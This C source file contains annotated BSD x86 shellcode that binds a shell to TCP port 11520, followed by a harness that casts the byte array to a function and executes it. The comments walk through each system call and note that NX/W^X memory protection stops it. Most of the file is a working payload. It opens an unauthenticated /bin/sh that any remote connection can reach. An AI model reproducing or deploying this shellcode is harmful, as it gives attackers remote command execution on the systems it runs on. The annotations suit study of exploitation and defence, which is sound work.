/* 70-byte port-binding shellcode - BSD-x86
 * - by bighawk (bighawk@kryptology.org)
 *
 * This shellcode binds a shell on port 11520
 * Tested on: FreeBSD-4.4, OpenBSD-2.6
 *
 */

/* The raw x86 bytes of the payload; the comment on each line is the
 * instruction that line encodes (the disassembly the author supplied).
 *
 * Reading notes:
 *  - Every "int 80h" is a BSD system call; the call number is loaded into
 *    al immediately before it ("mov al, N").  Read against the FreeBSD
 *    syscall table, 97/104/106/30/90/59 are socket/bind/listen/accept/
 *    dup2/execve, which matches the "binds a shell" description above.
 *  - The 70 bytes contain no 0x00, so strlen() in main() sees the whole
 *    array and the array can be stored as a C string.
 *  - The array lives in writable data.  Jumping into it only works where
 *    that region is also mapped executable; a W^X/NX-enforcing kernel is
 *    expected to fault at the call instead.
 */
char code[] =

   /* eax = 0, edx = 0 (cdq sign-extends eax into edx) */
   "\x31\xc0"			// xor	  eax, eax
   "\x99"			// cdq
   /* push 0, 1, 2 then a dummy return address: socket(2, 1, 0) */
   "\x52"			// push	  edx
   "\x42"			// inc	  edx
   "\x52"			// push	  edx
   "\x42"			// inc	  edx
   "\x52"			// push	  edx
   "\x50"			// push	  eax
   "\xb0\x61"			// mov	  al, 97
   "\xcd\x80"			// int	  80h
   /* Build the sockaddr on the stack.  45 is 0x2d; with the 16-bit push
    * of dx (edx is 2 here) the port bytes land as 0x2d 0x00, i.e. 0x2d00
    * = 11520 in network byte order, the port named in the header. */
   "\x6a\x2d"                   // push   byte 45
   "\x66\x52"			// push	  dx
   "\x89\xe3"			// mov	  ebx, esp      ; ebx -> sockaddr
   /* bind(sockfd, ebx, 16); eax still holds the fd socket() returned */
   "\x6a\x10"			// push	  byte 16
   "\x53"			// push	  ebx
   "\x50"			// push	  eax
   "\x50"			// push	  eax
   "\xb0\x68"			// mov	  al, 104
   "\xcd\x80"			// int	  80h
   /* The pop recovers the fd pushed as the dummy slot above; listen()
    * then accept() reuse the same three stack slots. */
   "\x5b"			// pop	  ebx
   "\x50"			// push	  eax
   "\x53"			// push	  ebx
   "\x50"			// push	  eax
   "\xb0\x6a"			// mov	  al, 106
   "\xcd\x80"			// int	  80h
   "\xb0\x1e"			// mov	  al, 30
   "\xcd\x80"			// int	  80h
   /* duploop: dup2(eax, edx) for edx = 2, 1, 0.  The jns displacement
    * (0xf6 = -10) lands on the "push edx" that opens this group. */
   "\x52"			// push	  edx
   "\x50"			// push	  eax
   "\x52"			// push   edx
   "\xb0\x5a"			// mov	  al, 90
   "\xcd\x80"			// int	  80h
   "\x4a"			// dec	  edx
   "\x79\xf6"			// jns	  duploop
   /* The two dwords are "n/sh" and "//bi" (little-endian), so the stack
    * now holds "//bin/sh" and ebx points at it. */
   "\x68\x6e\x2f\x73\x68"	// push	  dword 68732f6eh
   "\x68\x2f\x2f\x62\x69"	// push	  dword 69622f2fh
   "\x89\xe3"			// mov	  ebx, esp
   /* execve(ebx, esp-> {0}, 0); eax is 0 after the last dup2 */
   "\x50"			// push	  eax
   "\x54"			// push	  esp
   "\x53"			// push	  ebx
   "\x53"			// push	  ebx
   "\xb0\x3b"			// mov	  al, 59
   "\xcd\x80";			// int	  80h


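#include <stdio.h>

/* Test harness: prints the payload length, then transfers control into it.
 *
 * Fixes over the original: main() had an implicit int return type and no
 * return value, and printed a size_t with %d.  sizeof code - 1 is the same
 * value strlen(code) gave (the array holds no 0x00 byte), so the output is
 * unchanged: "size: 70 bytes".
 *
 * The call into a char array only works where the data segment is mapped
 * executable; on a W^X/NX-enforcing system the call is expected to fault
 * rather than run the payload.
 */
int main(void)
{
  /* Reinterpret the array's address as an entry point. */
  void (*entry)(void) = (void (*)(void))code;

  printf("size: %zu bytes\n", sizeof code - 1);
  entry();
  return 0;
}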
